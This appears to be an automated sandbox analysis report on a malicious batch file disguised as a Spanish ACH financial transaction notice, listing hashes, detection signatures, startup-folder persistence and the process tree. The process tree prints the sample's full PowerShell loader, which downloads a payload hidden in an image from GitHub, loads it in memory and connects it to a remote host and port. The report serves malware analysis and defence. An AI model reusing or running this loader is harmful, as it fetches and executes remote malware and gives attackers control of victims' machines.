Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29/10/2024, 22:23
Static task
static1
Behavioral task
behavioral1
Sample
OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat
Resource
win7-20240903-en
6 signatures
180 seconds
General
-
Target
OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat
-
Size
210KB
-
MD5
fc162f6d374e3bce9c3130fdcb6b7307
-
SHA1
a874953f738df2b9c59d52d1262aac387bf26fb7
-
SHA256
c7b24736650ed6130939821101f4641e1a50a2316f3bbcf974d85c8de585a40d
-
SHA512
520bf9202494786604d194bf6b23020231810744bbb405c1177ab7ee30c82633027445c3bb4e464cc690e7d7d0b6daaecd0a5884aeebcd585541d746cdf662e8
-
SSDEEP
6144:vZnip76K90FB+Z7VIuArKAgY2aaOOiuauK+yp8:E
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true
exe.dropper
https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2680 powershell.exe 6 2680 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2680 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3004 wrote to memory of 2680 3004 cmd.exe 31 PID 3004 wrote to memory of 2680 3004 cmd.exe 31 PID 3004 wrote to memory of 2680 3004 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-